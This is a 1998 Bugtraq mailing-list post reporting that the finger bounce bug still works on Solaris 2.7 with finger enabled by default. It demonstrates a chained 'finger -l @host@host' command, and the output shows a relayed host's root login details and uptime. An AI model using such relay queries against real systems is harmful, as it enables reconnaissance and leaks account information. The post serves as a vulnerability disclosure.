Bugtraq mailing list archives

lame old finger bounce bug still exists in sparc 2.7

From: spoon () GSLINK COM (spoon)
Date: Sat, 26 Dec 1998 20:08:38 -0500


Hi,

while beating on solaris today i found this... Yeah and finger is still
enabled in inetd.conf by default in solaris 2.7. suprised this still
exists... *shrug*

morph = Soalris 2.7

overlord = see the banner Linux provides ;)

overlord:~# finger -l @overlord@morph
[morph]
[overlord]

Welcome to Linux version 2.0.35 at overlord !

  9:22pm  up 20 days, 21:59,  6 users,  load average: 0.00, 0.01, 0.00

Login: root                             Name:
Directory: /root                        Shell: /bin/bash
On since Wed Dec 23 23:31 (EST) on tty1   2 days 20 hours idle
Mail last read Thu Dec 03 20:25 1998 (EST)
No Plan.

etc
.
.
.


matt

Current thread:

Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service Ulf Munkedal (Dec 23)
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service David Schwartz (Dec 23)
- The grand-son of Cuartango Hole aleph1 () UNDERGROUND ORG (Dec 23)
- Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service Guido van Rooij (Dec 24)
  - lame old finger bounce bug still exists in sparc 2.7 spoon (Dec 26)
  - Breeze Network Server remote reboot and other bogosity. //Stany (Dec 26)
  - [patch] fix for urandom read(2) not interruptible Andrea Arcangeli (Dec 27)
  - Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service Jeff Roberson (Dec 28)
  - Oracle8 TNSLSNR DoS Jason Ackley (Dec 28)
  - ssh2 security problem (and patch) (fwd) Darren Reed (Dec 29)
  - Comparison of THC-SCAN v2.0 with Sandstorm PhoneSweep 1.02 Simson L. Garfinkel (Dec 29)
  - Local/remote exploit for SCO UNIX. leshka (Dec 29)
  - followup on yahoo pager security problem Neulinger, Nathan R. (Dec 29)
  - Nmap 2.02 released (fwd) Chris Tobkin (Dec 29)
  - netscan.org - broadcast ICMP list Troy Davis (Dec 29)

(Thread continues...)